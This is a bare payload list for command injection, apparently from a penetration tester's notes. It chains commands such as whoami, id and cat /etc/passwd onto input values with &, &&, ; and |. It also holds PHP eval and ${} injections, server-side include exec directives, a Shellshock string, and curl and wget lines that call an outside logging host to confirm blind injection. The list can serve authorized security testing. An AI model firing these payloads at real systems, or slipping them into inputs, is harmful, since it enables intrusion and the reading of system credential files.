Cmd injection
Payload
cmd-injection.txt
eval('id')
eval('ls')
eval('pwd')
eval('whoami')
eval('sleep 20')
eval('cat /etc/passwd')
127.0.0.1 & id
127.0.0.1 && id
127.0.0.1 ; id
127.0.0.1 | id
127.0.0.1 & whoami
127.0.0.1 && whoami
127.0.0.1 ; whoami
127.0.0.1 | whoami
127.0.0.1 & sleep 20
127.0.0.1 && sleep 20
127.0.0.1 ; sleep 20
127.0.0.1 | sleep 20
127.0.0.1 & cat /etc/passwd
127.0.0.1 && cat /etc/passwd
127.0.0.1 ; cat /etc/passwd
127.0.0.1 | cat /etc/passwd
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="cat /etc/passwd" -->
<!--#exec cmd="curl http://log.michalszalkowski.com" -->
<!--#exec cmd="dir" -->
<!--#exec cmd="ipconfig" -->
<!--#exec cmd="ls" -->
<!--#exec cmd="perl -e 'print "X"*5000'" -->
<!--#exec cmd="sleep 10" -->
<!--#exec cmd="uname" -->
<!--#exec cmd="/usr/bin/id;-->
<!--#exec cmd="whoami" -->
" & whoami
" && whoami
" | whoami
" || whoami
" whoami
"; whoami
& whoami
&& whoami
' & whoami
' && whoami
' || whoami
' whoami
'; whoami
; whoami
| whoami
whoami
() { :;}; wget http://log.michalszalkowski.com
& wget http://log.michalszalkowski.com
| wget http://log.michalszalkowski.com
&& wget http://log.michalszalkowski.com
; wget http://log.michalszalkowski.com
wget http://log.michalszalkowski.com
& wget http://log.michalszalkowski.com
&& wget http://log.michalszalkowski.com
; wget http://log.michalszalkowski.com
$(`cat /etc/passwd`)
$(`dir`)
$(`ls`)
;${@print(md5(0))};
${@print("0")}
{${sleep(20)}}
%20{${sleep(20)}}
{${sleep(hexdec(dechex(20)))}}
$(`whoami`)
& id
&&id
;id
;id;
;id|
`id`
| id
|id
;id\n
& ifconfig
&& ifconfig
; ifconfig
| ifconfig
ifconfig